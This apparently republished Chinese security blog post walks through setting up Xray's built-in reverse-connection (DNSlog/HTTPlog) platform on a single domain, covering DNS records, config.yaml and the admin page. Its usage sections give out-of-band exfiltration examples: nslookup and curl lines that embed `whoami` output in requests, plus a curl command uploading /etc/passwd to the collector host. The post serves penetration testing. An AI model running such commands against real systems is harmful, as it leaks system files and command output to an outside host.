DNSlog搭建-单域名单接管部署xray reverse
2022-8-5 10:49:35 Author: NOVASEC(查看原文) 阅读量:144 收藏

△△△点击上方“蓝字”关注我们了解更多精彩
0x00 简介

本文是讲解使用单个域名搭建Xray Reverse反连平台搭建。

关键字解释:

参考 DNSlog搭建-单域名单接管部署RevSuithttps://mp.weixin.qq.com/s/hGwcMz8sh7BImBjI3wHqnQ
0x01 预备

一个公网VPS

一个DNS域名:

一个CloudFlare帐号[可选]

参考 DNSlog搭建-单域名单接管部署RevSuithttps://mp.weixin.qq.com/s/hGwcMz8sh7BImBjI3wHqnQ
0x02 DNS接管
参考 DNSlog搭建-单域名单接管部署RevSuithttps://mp.weixin.qq.com/s/hGwcMz8sh7BImBjI3wHqnQ
0x03 Xray Reverse介绍与规划

Xray Reverse是Xray内置的反连平台,支持 HTTP、DNS、RMI.

DNSlog规划:使用子域名【 *.log.base.xyz】做DNSlog记录。
注:* 表示预留的数据位。注: xray reverse不需要规划HTTPlog的URL。
0x04 域名解析配置
1、dnslog域名解析配置

方案1、常规设置方案:

设置A记录  名称 ns1 内容 9.9.9.9 设置NS记录 名称 log 内容 ns1.base.xyz

方案2、使用ns.[ip].nip.io做NS服务器

设置NS记录 名称 log 内容 ns.9.9.9.9.nip.io

注:nip.io可解析子域名到IP,实现不配置NS记录,缺点是会暴露真实VPS IP。

2、httplog相关域名设置【可选】:

设置A记录       名称 @     内容 9.9.9.9设置CNAME记录  名称 www   内容 base.xyz

注:HTTP域名为可选项,没有域名可通过真实IP访问URL进行记录。

参考 DNSlog搭建-单域名单接管部署RevSuit
0x05 编辑配置文件
xray reverse 首次运行时将会生成配置文件模板,需要编辑其中的内容然后重新运行。
启动命令: ./xray reverse后台运行: nohup ./xray reverse &

修改config.yaml中的域名为【log.base.xyz】端口号【80】

# 关键配置 # Xray v1.8.5reverse:  db_file_path: "reverse.db"  token: "密码密码"  http:    enabled: true    listen_ip: 0.0.0.0    listen_port: "80"    ip_header: ""  dns:    enabled: true    listen_ip: 0.0.0.0     domain: "log.base.xyz"    is_domain_name_server: true    resolve:    - type: A      record: localhost      value: 127.0.0.1      ttl: 60  client:    remote_server: false    http_base_url: ""    dns_server_ip: ""
# 注: 如果出现错误请用引号包含配置属性

注:端口号任意,国内VPS使用域名访问时,需要域名备案。

11
0x06 访问管理页面
http://base.xyz/cland/#/http://9.9.9.9/cland/#/

0x07 DNSlog调用和查看
生成DNS:

访问格式:

ping p-16c9e7-ii32.log.base.xyzcurl http://p-16c9e7-ii32.dns.icbcdns.xyznslookup p-16c9e7-ii32.`whoami`.dns.icbcdns.xyz 
注:需要先生成一个域名,否则无法数据入库。:Xray Reverse的数据只能插在域名中间。

查看记录:

0x08 ‍HTTPlog调用和查看
生成URL:

访问格式: 

curl http://9.9.9.9/p/1655c2/uWpe/`whoami`curl http://9.9.9.9/p/1655c2/uWpe/ -F [email protected]/etc/passwd
注:需要先生成一个URL,否则无法数据入库。注:Xray Reverse的数据只能插在URL后。其他特点:支持POST访问,会记录完整报文。
查看记录: 

0x09 总结
Xray Reverse适合用于Xray的扫描使用,感谢长亭Xray的公开分享。
技巧: 你可以修改本文中的ns1、log为其他子域名,实现一个主域名下搭建多个DNS平台。

1、本团队任何实战都是已授权的、任何技术及工具也仅用于学习分享,请勿用于任何非法、违法活动,如有违背请自行承担后果,感谢大家的支持!!!

2、本团队一贯秉承Free共享的精神,但是也有大家的小愿望,因此本团队所有分享工具,严禁不经过授权的公开分享,被关注就是对我们付出的精力做的最大的支持。

END

如您有任何投稿、问题、建议、需求、合作、后台留言NOVASEC公众号!

或添加NOVASEC-MOYU 以便于及时回复。

感谢大哥们的对NOVASEC的支持点赞和关注

加入我们与萌新一起成长吧!

本团队任何技术及文件仅用于学习分享,请勿用于任何违法活动,感谢大家的支持!


文章来源: http://mp.weixin.qq.com/s?__biz=MzUzODU3ODA0MA==&mid=2247487731&idx=1&sn=6729c04d9466b3a4b36d2cd4ac6dde19&chksm=fad4cde4cda344f23029523ab4f8f6ff736d273f0a64888a542bfeba4a597442414c2c2a091b#rd
如有侵权请联系:admin#unsafe.sh